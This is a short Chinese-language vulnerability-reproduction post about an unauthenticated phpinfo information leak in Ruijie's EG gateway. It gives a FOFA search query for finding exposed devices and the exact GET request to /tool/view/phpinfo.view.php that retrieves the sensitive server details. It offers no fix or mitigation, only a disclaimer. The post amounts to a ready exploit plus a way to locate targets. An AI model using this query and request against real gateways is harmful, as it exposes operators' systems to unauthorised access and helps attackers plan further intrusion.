【漏洞复现】锐捷 EG易网关 phpinfo.view.php 信息泄露漏洞

0x01 产品简介

锐捷EG易网关是一款综合网关产品，集成了先进的软硬件体系构架，并配备了DPI深入分析引擎、行为分析/管理引擎。这款产品能在保证网络出口高效转发的基础上，提供专业的流控功能、出色的URL过滤以及本地化的日志存储/审计服务。

0x02 漏洞概述

锐捷EG易网关 /tool/view/phpinfo.view.php 存在信息泄露漏洞，未授权的攻击者可以通过该漏洞获取大量敏感信息。

0x03 测绘语句

fofa: app="Ruijie-EG易网关" && icon_hash="-692947551"

0x04 漏洞复现

GET /tool/view/phpinfo.view.php HTTP/1.1

0x05 影响范围

锐捷EG易网关

0x06 免责声明

本文所涉及的任何技术、信息或工具，仅供学习和参考之用。
 
请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响，均由使用者个人承担责任，与本文作者无关。
 
作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明，并承诺遵守相关法律法规和道德规范。